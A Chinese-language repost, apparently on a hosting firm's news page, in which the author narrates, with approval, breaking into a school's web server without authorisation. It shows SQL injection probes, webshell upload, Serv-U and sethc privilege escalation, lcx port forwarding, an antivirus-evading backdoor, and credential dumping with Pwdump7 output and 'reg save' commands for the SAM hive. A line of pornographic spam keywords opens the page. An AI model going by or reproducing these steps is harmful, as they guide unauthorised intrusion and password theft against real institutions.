人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

入侵滲透進入某學(xué)校網(wǎng)站服務(wù)器

發(fā)布日期:2021-12-25 04:12 | 文章來源:站長之家
在網(wǎng)上閑的蛋疼無聊百度搜索“蛋疼”二字看到一篇文章《蛋疼的中國黑客》雖然你的出發(fā)點是好的但是你侮辱了他們雖然我不是黑客但是我要消滅你…….

比較詳細(xì)適合新手大牛路過…

說做就做,日之

獨立ip服務(wù)器沒有掛其他站點

Ping ip返回值判斷對方機器是W2003服務(wù)器

在收集一下端口開了21 135 139

ftp XXX返回

220 Serv-U FTP Server v6.4 for WinSock ready..

裝了SEVER u

經(jīng)搜集確定服務(wù)器為win2003+asp+iis6.0+mssql

打開目標(biāo)3389沒反應(yīng)學(xué)校網(wǎng)站應(yīng)該是放在內(nèi)網(wǎng)

一、獲取webshell

首先從網(wǎng)站的asp程序入手

http://www.xxxxx.com/news.asp?id=21&sc=1%20and%201=1(and注入1=1頁面正常1=2頁面錯誤有注入)

返回到了首頁,再來

http://www.xxxxx.com/news.asp?id=21&sc=1%20or%201=1(or注入如果or1=1返回錯誤即有注入返回正確頁面則無注入)

又返回到了首頁看來這個網(wǎng)站的管理員還算有點安全知識


不死心繼續(xù)觀察利用搜索引擎載入到啊D掃掃site:xxxx.com asp?id=

http://www.xxxxx.com/show_news.asp?id=418’

隨手一個單引號

YES出現(xiàn)注入猜解猜解

激動的時候到了MD5 NOT FOUND暴力破解吧沒興趣

繼續(xù)回到主站看到了一個留言板抱著試試的心態(tài)

抓包提交后既然有數(shù)據(jù)庫地址

Ok小失誤成功得到地址

Fckeditor漏洞也可以利用

這里就不做演示了

二、服務(wù)器提權(quán)

掃描了下端口

本地打開21,1433,3389等端口,對外只開放了80端口

試著看下可寫目錄極品出來了

這就好辦了SU提權(quán)OK替換sethc成功加入管理

內(nèi)網(wǎng)進不去那我們就把它轉(zhuǎn)發(fā)出來用到lcx端口轉(zhuǎn)發(fā)

使用Lcx進行內(nèi)網(wǎng)端口轉(zhuǎn)發(fā)圖文講解

上傳lcx.exe

設(shè)置好之后成功進入服務(wù)器

在配置個馬兒反彈成功上線這個馬兒過內(nèi)殺軟全過瑞星就直接pass吧

三、內(nèi)網(wǎng)滲透

既然網(wǎng)站的安全這么差我就直接抓hash吧

使用Pwdump7提取系統(tǒng)密碼hash值

工具臨時下載地址:http://www.hackline.net/a/soft/cracking/2010/0412/3312.html

殺毒軟件可能會報毒。請自行檢測。

使用說明:

Pwdump7可以在CMD下提取出系統(tǒng)中的用戶的密碼hash (包括LM和NTLM),當(dāng)然必須要有系統(tǒng)權(quán)限.提取出了HASH,再用ophcrack破出明文密碼,對進一步滲透是有很大幫助的,經(jīng)我測試,在XP下是可以成功提取出來的.這個工具需要一個DLL文件支持,壓縮包中帶的,只需放到一個文件夾中即可,用法很簡單,直接輸入

D:\>PwDump7.exe
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
url: http://www.514.es

administrator:500:25FC25A0CA659E57ACEDB07452AB7A8E:6C1B3BE8D28CD3E7AB63122C8A572DDF:::
guest:501:0E175C3EFF8EED1652440321FCD91E4E:2850991451071A5B7A95F2977D4AAEF0:::
atarasco:1001:45C6AEEDC857A06DC595236F8F5FECAA:D0253497114C1B4CC337210F4580A716:::

用法:
pwdump7.exe (Dump system passwords)
pwdump7.exe -s <samfile> <systemfile> (Dump passwords from files)
pwdump7.exe -d <filename> [destionation] (Copy filename to destionation)
pwdump7.exe -h (Show this help)

-s 是從一個sam文件中提取hash,這個文件在%systemroot%\config\sam,這里.
-d 是把一個文件復(fù)制到另一個位置,D:\>PwDump7.exe -d c:\pagefile.sys pagefile.dmp 從這個例子中可以看出,他的特別之處在于,可以把進程正在占用的文件復(fù)制成功.
解決提示libeay32.dll找不到或缺少的問題

拷貝libeay32.dll到windows/system32下即可


在這里我給大家一個簡單的方法老外抓hash的方法

reg save hklm\system system

reg save hklm\sam sam


操作成功完成后自己就拿工具去破吧

感謝老大mr cool給我的工具

他的網(wǎng)站http://www.blackbap.org/

我這個內(nèi)網(wǎng)主機只有兩臺而且沒開3389

我就不繼續(xù)滲透了

版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問服務(wù)

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部